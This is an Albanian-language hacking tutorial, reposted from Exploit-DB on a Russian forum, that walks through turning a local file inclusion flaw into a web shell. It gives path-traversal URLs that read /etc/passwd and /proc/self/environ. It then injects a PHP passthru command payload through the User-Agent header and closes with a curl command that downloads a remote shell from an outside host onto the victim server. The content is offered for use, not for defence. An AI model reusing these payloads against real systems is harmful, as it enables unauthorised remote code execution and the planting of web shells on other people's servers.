- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13558
- Проверка EDB
-
- Пройдено
- Автор
- BI0
- Тип уязвимости
- PAPERS
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2009-12-12
Код:
--------------------------------------------------------------
[x] Paper : [Albanian] Shell Over LFI
[+] Author : bi0
[x] Contact : bukibv@hotmail.com
[x] Date : 12/12/2009
[x] Site : www.it-security.ws / www.ssteam.ws
[x] Thanks : packetdeath,redking,sp1r1t & all my Friends ...
--------------------------------------------------------------
______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[-]----------------------------[-]
| |
| 1. Nje Site LFI Vuln |
| 2. Modifikimi i User Agent |
| 3. Enjoy your Shell |
| |
[-]----------------------------[-]
[1]. Na nevojitet nje site LFI vuln psh :
[x] http://example.com/index.php?file=serach.php
Zevendesojm "search.php" me "../" dhe nese na jep error si ne vijim osht LFI vuln psh :
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/user/public_html/index.php on line 514
Tash e dimë se "/" gjindet 4 dir me lart pra :
[x] http://example.com/index.php?file=../../../../etc/passwd
Tash shikojm se a ka "logs" qe ruhen ne : /proc/self/environ,
Pra "/etc/passwd" e zevendesojm me "/proc/self/environ"
[x] http://example.com/index.php?file=../../../../proc/self/environ
Nese na del diqka si : "DOCUMENT_ROOT=" atëher i kemi gjetur "logs"
[2].Modifikimi i User Agentiti :
Shkojm te FireFox Browser URL the shkruajm : "about:config"
Te "Filter" shkruajm : "general.useragent.extra.firefox" the na paraqitet diqka keshtu :
----------------------------------------------------------------------------
Preference name Status Type Value
general.useragent.extra.firefox default string Firefox/3.5.5
----------------------------------------------------------------------------
Klikojm 2 here mbi "Firefox/3.5.5" dhe aty e shkruan :
<? passthru($_GET['c']); ?>
Per modifikm e User Agent mud ta perdorni edhe "User Agent Switcher" FireFox add-on
[3]. Enjoy your Shell..
Tash modifikimi perfundoj tash shkojm ketu :
[x] http://example.com/index.php?file=../../../../proc/self/environ
Ne Fund ja shtojm : &c=
[x] http://example.com/index.php?file=../../../../proc/self/environ&c=
Nese doni te vendosni shell vetem e shkruani :
[x] http://example.com/index.php?file=../../../../proc/self/environ&c=curl http://shellsite.com/locus7s.txt -o shell.php
Mund te perdorni edhe downloader tjeter ..
Tash shellin e kemi :
[x] http://example.com/shell.php
Kaloni Mir ..
#EOF- Источник
- www.exploit-db.com
